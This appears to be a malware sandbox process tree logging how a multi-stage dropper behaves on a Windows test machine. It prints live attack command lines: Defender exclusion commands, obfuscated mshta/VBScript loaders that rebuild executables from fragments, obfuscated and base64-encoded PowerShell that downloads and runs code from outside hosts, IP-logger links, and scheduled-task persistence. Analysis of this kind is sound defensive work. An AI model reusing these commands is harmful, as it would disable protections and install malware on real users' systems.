- Loads dropped DLL
-
C:\Windows\Temp\{8EA28810-03EA-4592-878E-4B0AC76BE1A5}\.be\VC_redist.x86.exe"C:\Windows\Temp\{8EA28810-03EA-4592-878E-4B0AC76BE1A5}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{D4CEA86E-FF00-4C04-BBAE-E9CB4C769D59} {F5B14FDD-1673-455A-B56F-358E332EFFDB} 313210⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks processor information in registry
- Modifies registry class
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 7488⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 5768⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 8688⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 8608⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 8928⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 7488⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 7688⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 8648⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 7288⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\Install.EXE"C:\Users\Admin\AppData\Local\Temp\Install.EXE"7⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"10⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\svchost.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"11⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vSiwQwGbDSN" /XML "C:\Users\Admin\AppData\Local\Temp\tmp13A3.tmp"11⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\INSTAL~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\INSTAL~1.EXE8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zSC0BB.tmp\Install.cmd" "9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1NEph710⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb03546f8,0x7ffcb0354708,0x7ffcb035471811⤵
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1156783.scr"C:\Users\Admin\AppData\Roaming\1156783.scr" /S8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\2805835.scr"C:\Users\Admin\AppData\Roaming\2805835.scr" /S8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\1847167.scr"C:\Users\Admin\AppData\Roaming\1847167.scr" /S8⤵
-
C:\Users\Admin\AppData\Roaming\8983957.scr"C:\Users\Admin\AppData\Roaming\8983957.scr" /S8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 6088⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "sfx_123_206.exe"10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "13⤵
-
C:\Windows\SysWOW64\control.execontrol ..\kZ_AmsXL.6G13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G14⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G15⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G16⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-01779.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-01779.tmp\setup_2.tmp" /SL5="$4029E,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-CEAR4.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-CEAR4.tmp\setup_2.tmp" /SL5="$202F0,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-48JP5.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-48JP5.tmp\postback.exe" ss111⤵
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.top/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"13⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.top/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"14⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\fmv4TorJh.exe"C:\Users\Admin\AppData\Local\Temp\fmv4TorJh.exe"13⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SYSTEM32\cmd.execmd /c "helimlim.bat"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA15⤵
- Blocklisted process makes network request
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\start.vbs16⤵
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\pli-game.exe"C:\Users\Admin\AppData\Local\Temp\pli-game.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed150b6a68b74a9.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed150b6a68b74a9.exeWed150b6a68b74a9.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1556d5b7e9b2c8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed1556d5b7e9b2c8.exeWed1556d5b7e9b2c8.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15bfd6504f7748c.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15bfd6504f7748c.exeWed15bfd6504f7748c.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 2766⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15cdfe4f1ee8.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15cdfe4f1ee8.exeWed15cdfe4f1ee8.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15cdfe4f1ee8.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15cdfe4f1ee8.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15cdfe4f1ee8.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15cdfe4f1ee8.exe" ) do taskkill -F -Im "%~nXU"7⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"11⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM12⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM14⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "Wed15cdfe4f1ee8.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15e2f113a40ce5.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15e2f113a40ce5.exeWed15e2f113a40ce5.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15e2f113a40ce5.exeC:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15e2f113a40ce5.exe6⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1h8Se77⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb03546f8,0x7ffcb0354708,0x7ffcb03547188⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2052 /prefetch:28⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2444 /prefetch:38⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5720 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5720 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:18⤵
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6196 /prefetch:28⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2920 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:18⤵
-
